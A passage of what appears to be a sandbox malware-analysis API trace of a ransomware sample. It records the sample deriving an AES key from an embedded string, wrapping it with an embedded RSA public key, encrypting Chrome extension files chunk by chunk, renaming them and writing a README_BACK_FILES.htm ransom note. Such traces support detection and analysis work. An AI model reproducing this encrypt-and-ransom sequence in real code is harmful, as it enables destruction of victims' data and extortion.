lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.101] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.101] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.102] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1d4, lpOverlapped=0x0) returned 1 [0263.102] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1d4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1e0) returned 1 [0263.102] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1e0, lpOverlapped=0x0) returned 1 [0263.102] CloseHandle (hObject=0x5d5c) returned 1 [0263.102] CloseHandle (hObject=0x5d60) returned 1 [0263.102] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), bFailIfExists=0) returned 1 [0263.105] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json", dwFileAttributes=0x0) returned 1 [0263.105] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg")) returned 1 [0263.107] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.fuck")) returned 1 [0263.108] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.108] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.108] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.108] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.108] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.108] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\readme_back_files.htm")) returned 0xffffffff [0263.108] AreFileApisANSI () returned 1 [0263.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.108] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.109] GetFileType (hFile=0x5d64) returned 0x1 [0263.109] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.110] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.110] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.110] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.110] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.110] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.110] GetLastError () returned 0x0 [0263.110] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json")) returned 0x20 [0263.110] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json", dwFileAttributes=0x80) returned 1 [0263.111] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.112] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.113] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.113] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.115] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.115] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.115] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.115] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.115] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.115] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.115] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74890) returned 1 [0263.116] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74890, dwCertEncodingType=0x1, pInfo=0x2ead4f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead520*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead528*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e340) returned 1 [0263.116] CryptEncrypt (in: hKey=0x2e7e340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.116] CryptEncrypt (in: hKey=0x2e7e340, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74010*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74010*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.116] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e74010*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74010*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.117] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.124] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.124] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.134] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.134] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.134] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.135] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.135] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.135] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.135] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.135] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.135] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.136] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.136] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, 